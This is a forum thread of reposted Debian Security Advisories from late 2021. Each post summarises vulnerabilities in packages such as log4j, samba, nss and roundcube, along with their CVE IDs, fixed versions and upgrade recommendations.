Debian Security Advisory

    • Offizieller Beitrag

    Package : postgresql-13

    CVE ID : CVE-2021-23214 CVE-2021-23222


    Jacob Champion discovered two vulnerabilities in the PostgreSQL database system, which could result in man-in-the-middle attacks.


    For the stable distribution (bullseye), these problems have been fixed in version 13.5-0+deb11u1.


    We recommend that you upgrade your postgresql-13 packages.


    For the detailed security status of postgresql-13 please refer to its security tracker page at:

    Information on source package postgresql-13


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : node-tar

    CVE ID : CVE-2021-37701 CVE-2021-37712


    It was discovered that the symlink extraction protections in node-tar, a Tar archives module for Node.js could by bypassed; allowing a malicious Tar archive to symlink into an arbitrary location.


    For the stable distribution (bullseye), these problems have been fixed in version 6.0.5+ds1+~cs11.3.9-1+deb11u2.


    We recommend that you upgrade your node-tar packages.


    For the detailed security status of node-tar please refer to its security tracker page at:

    Information on source package node-tar


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : tomcat9

    CVE ID : CVE-2021-42340


    Apache Tomcat, the servlet and JSP engine, did not properly release an HTTP upgrade connection for WebSocket connections once the WebSocket connection was closed. This created a memory leak that, over time, could lead to a denial of service via an OutOfMemoryError.


    For the stable distribution (bullseye), this problem has been fixed in version 9.0.43-2~deb11u3.


    We recommend that you upgrade your tomcat9 packages.


    For the detailed security status of tomcat9 please refer to its security tracker page at:

    Information on source package tomcat9


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : libxml-security-java

    CVE ID : CVE-2021-40690

    Debian Bug : 994569


    Apache Santuario - XML Security for Java is vulnerable to an issue where the "secureValidation" property is not passed correctly when creating a KeyInfo from a KeyInfoReference element. This allows an attacker to abuse an XPath Transform to extract any local .xml files in a RetrievalMethod element.


    For the oldstable distribution (buster), this problem has been fixed in version 2.0.10-2+deb10u1.


    For the stable distribution (bullseye), this problem has been fixed in version 2.0.10-2+deb11u1.


    We recommend that you upgrade your libxml-security-java packages.


    For the detailed security status of libxml-security-java please refer to its security tracker page at:

    Information on source package libxml-security-java


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : salt

    CVE ID : CVE-2021-21996 CVE-2021-31607 CVE-2021-25284 CVE-2021-25283

    CVE-2021-25282 CVE-2021-25281 CVE-2021-3197 CVE-2021-3148

    CVE-2021-3144 CVE-2020-35662 CVE-2020-28972 CVE-2020-28243

    Debian Bug : 983632 994016 987496


    Multiple security vulnerabilities have been discovered in Salt, a powerful remote execution manager, that allow for local privilege escalation on a minion, server side template injection attacks, insufficient checks for eauth credentials, shell and command injections or incorrect validation of SSL certificates.


    For the oldstable distribution (buster), this problem has been fixed in version 2018.3.4+dfsg1-6+deb10u3.


    For the stable distribution (bullseye), this problem has been fixed in version 3002.6+dfsg1-4+deb11u1.


    We recommend that you upgrade your salt packages.


    For the detailed security status of salt please refer to its security tracker page at:

    Information on source package salt


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : openjdk-17

    CVE ID : CVE-2021-35556 CVE-2021-35559 CVE-2021-35561 CVE-2021-35564

    CVE-2021-35567 CVE-2021-35578 CVE-2021-35586 CVE-2021-35603


    Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service, incorrect Kerberos ticket use, selection of weak ciphers or information disclosure.


    For the stable distribution (bullseye), these problems have been fixed in version 17.0.1+12-1+deb11u2.


    We recommend that you upgrade your openjdk-17 packages.


    For the detailed security status of openjdk-17 please refer to its security tracker page at:

    Information on source package openjdk-17


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : roundcube

    CVE ID : CVE-2021-44025 CVE-2021-44026

    Debian Bug : 1000156


    It was discovered that roundcube, a skinnable AJAX based webmail solution for IMAP servers, did not properly sanitize requests and mail messages. This would allow an attacker to perform Cross-Side Scripting

    (XSS) or SQL injection attacks.


    For the oldstable distribution (buster), these problems have been fixed in version 1.3.17+dfsg.1-1~deb10u1.


    For the stable distribution (bullseye), these problems have been fixed in version 1.4.12+dfsg.1-1~deb11u1.


    We recommend that you upgrade your roundcube packages.


    For the detailed security status of roundcube please refer to its security tracker page at:

    Information on source package roundcube


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : icu

    CVE ID : CVE-2020-21913


    Rongxin Wu discovered a use-after-free vulnerability in the International Components for Unicode (ICU) library which could result in denial of service or potentially the execution of arbitrary code.


    For the oldstable distribution (buster), this problem has been fixed in version 63.1-6+deb10u2.


    We recommend that you upgrade your icu packages.


    For the detailed security status of icu please refer to its security tracker page at:

    Information on source package icu


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : samba

    CVE ID : CVE-2020-25717


    Andrew Bartlett discovered that Samba, a SMB/CIFS file, print, and login server for Unix, may map domain users to local users in an undesired way. This could allow a user in an AD domain to potentially become root on domain members.


    A new parameter "min domain uid" (default 1000) has been added to specify the minimum uid allowed when mapping a local account to a domain account.


    Further details and workarounds can be found in the upstream advisory https://www.samba.org/samba/security/CVE-2020-25717.html


    For the oldstable distribution (buster), this problem has been fixed in version 2:4.9.5+dfsg-5+deb10u2. Additionally the update mitigates CVE-2020-25722. Unfortunately the changes required to fix additional CVEs affecting Samba as an AD-compatible domain controller are too invasive to be backported. Thus users using Samba as an AD-compatible domain controller are encouraged to migrate to Debian bullseye. From this point onwards AD domain controller setups are no longer supported in Debian oldstable.


    We recommend that you upgrade your samba packages.


    For the detailed security status of samba please refer to its security tracker page at:

    Information on source package samba


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : nss

    CVE ID : CVE-2021-43527


    Tavis Ormandy discovered that nss, the Mozilla Network Security Service library, is prone to a heap overflow flaw when verifying DSA or RSA-PPS signatures, which could result in denial of service or potentially the execution of arbitrary code.


    For the oldstable distribution (buster), this problem has been fixed in version 2:3.42.1-1+deb10u4.


    For the stable distribution (bullseye), this problem has been fixed in version 2:3.61-1+deb11u1.


    We recommend that you upgrade your nss packages.


    For the detailed security status of nss please refer to its security tracker page at:

    Information on source package nss


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : xen

    CVE ID : CVE-2021-28704 CVE-2021-28705 CVE-2021-28706
    CVE-2021-28707 CVE-2021-28708 CVE-2021-28709

    Multiple vulnerabilities have been discovered in the Xen hypervisor,
    which could result in privilege escalation, denial of service or
    information leaks.

    For the stable distribution (bullseye), these problems have been fixed in
    version 4.14.3+32-g9de3671772-1~deb11u1.

    We recommend that you upgrade your xen packages.

    For the detailed security status of xen please refer to
    its security tracker page at:
    https://security-tracker.debian.org/tracker/xen

    Further information about Debian Security Advisories, how to apply
    these updates to your system and frequently asked questions can be
    found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : python-babel

    CVE ID : CVE-2021-20095
    Debian Bug : 987824

    It was discovered that missing input sanitising in Babel, a set of
    tools for internationalising Python applications, could result in
    the execution of arbitrary code.

    For the oldstable distribution (buster), this problem has been fixed
    in version 2.6.0+dfsg.1-1+deb10u1.

    We recommend that you upgrade your python-babel packages.

    For the detailed security status of python-babel please refer to
    its security tracker page at:
    https://security-tracker.debian.org/tracker/python-babel

    Further information about Debian Security Advisories, how to apply
    these updates to your system and frequently asked questions can be
    found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : wireshark

    CVE ID : CVE-2021-22207 CVE-2021-22222 CVE-2021-22235 CVE-2021-39920

    CVE-2021-39921 CVE-2021-39922 CVE-2021-39923 CVE-2021-39924

    CVE-2021-39925 CVE-2021-39926 CVE-2021-39928 CVE-2021-39929


    Multiple vulnerabilities have been discovered in Wireshark, a network protocol analyzer which could result in denial of service or the execution of arbitrary code.


    For the oldstable distribution (buster), CVE-2021-39925 has been fixed in in version 2.6.20-0+deb10u2.


    For the stable distribution (bullseye), these problems have been fixed in version 3.4.10-0+deb11u1.


    We recommend that you upgrade your wireshark packages.


    For the detailed security status of wireshark please refer to its security tracker page at:

    Information on source package wireshark


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : apache-log4j2

    CVE ID : CVE-2021-44228 CVE-2020-9488

    Debian Bug : 959450 1001478


    Chen Zhaojun of Alibaba Cloud Security Team discovered a critical security vulnerability in Apache Log4j, a popular Logging Framework for Java. JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From version 2.15.0, this behavior has been disabled by default.


    This update also fixes CVE-2020-9488 in the oldstable distribution (buster). Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender.


    For the oldstable distribution (buster), this problem has been fixed in version 2.15.0-1~deb10u1.


    For the stable distribution (bullseye), this problem has been fixed in version 2.15.0-1~deb11u1.


    We recommend that you upgrade your apache-log4j2 packages.


    For the detailed security status of apache-log4j2 please refer to its security tracker page at:

    Information on source package apache-log4j2


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : openjdk-11

    CVE ID : CVE-2021-35550 CVE-2021-35556 CVE-2021-35559 CVE-2021-35561

    CVE-2021-35564 CVE-2021-35565 CVE-2021-35567 CVE-2021-35578

    CVE-2021-35586 CVE-2021-35603


    Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service, incorrect Kerberos ticket use, selection of weak ciphers or information disclosure.


    The oldstable distribution (buster), these problems have been fixed in version 11.0.13+8-1~deb10u1.


    We recommend that you upgrade your openjdk-11 packages.


    For the detailed security status of openjdk-11 please refer to its security tracker page at:

    Information on source package openjdk-11


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : mediawiki

    CVE ID : CVE-2021-44857 CVE-2021-44858 CVE-2021-45038


    Multiple security issues were discovered in MediaWiki, a website engine for collaborative work: Vulnerabilities in the mcrundo and rollback actions may allow an attacker to leak page content from private wikis or to bypass edit restrictions.


    For additional information please refer to https://www.mediawiki.org/wiki/2021-12_security_release/FAQ


    For the oldstable distribution (buster), these problems have been fixed in version 1:1.31.16-1+deb10u2.


    For the stable distribution (bullseye), these problems have been fixed in version 1:1.35.4-1+deb11u2.


    We recommend that you upgrade your mediawiki packages.


    For the detailed security status of mediawiki please refer to its security tracker page at:

    Information on source package mediawiki


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : apache-log4j2

    CVE ID : CVE-2021-45046

    Debian Bug : 1001729


    It was found that the fix to address CVE-2021-44228 in Apache Log4j, a Logging Framework for Java, was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack.


    For the oldstable distribution (buster), this problem has been fixed in version 2.16.0-1~deb10u1.


    For the stable distribution (bullseye), this problem has been fixed in version 2.16.0-1~deb11u1.


    We recommend that you upgrade your apache-log4j2 packages.


    For the detailed security status of apache-log4j2 please refer to its security tracker page at:

    Information on source package apache-log4j2


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : modsecurity-apache

    CVE ID : CVE-2021-42717


    It was discovered that modsecurity-apache, an Apache module to tighten the Web application security, does not properly handles excessively nested JSON objects, which could result in denial of service. The update introduces a new 'SecRequestBodyJsonDepthLimit' option to limit the maximum request body JSON parsing depth which ModSecurity will accept (defaults to 10000).


    For the oldstable distribution (buster), this problem has been fixed in version 2.9.3-1+deb10u1.


    For the stable distribution (bullseye), this problem has been fixed in version 2.9.3-3+deb11u1.


    We recommend that you upgrade your modsecurity-apache packages.


    For the detailed security status of modsecurity-apache please refer to its security tracker page at:

    Information on source package modsecurity-apache


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : apache-log4j2

    CVE ID : CVE-2021-45105

    Debian Bug : 1001891


    It was found that Apache Log4j2, a Logging Framework for Java, did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a denial of service.


    For the oldstable distribution (buster), this problem has been fixed in version 2.17.0-1~deb10u1.


    For the stable distribution (bullseye), this problem has been fixed in version 2.17.0-1~deb11u1.


    We recommend that you upgrade your apache-log4j2 packages.


    For the detailed security status of apache-log4j2 please refer to its security tracker page at:

    Information on source package apache-log4j2


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

    • Offizieller Beitrag

    Package : tang

    CVE ID : CVE-2021-4076


    A flaw was discovered in tang, a network-based cryptographic binding server, which could result in leak of private keys.


    For the stable distribution (bullseye), this problem has been fixed in version 8-3+deb11u1.


    We recommend that you upgrade your tang packages.


    For the detailed security status of tang please refer to its security tracker page at:

    Information on source package tang


    Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/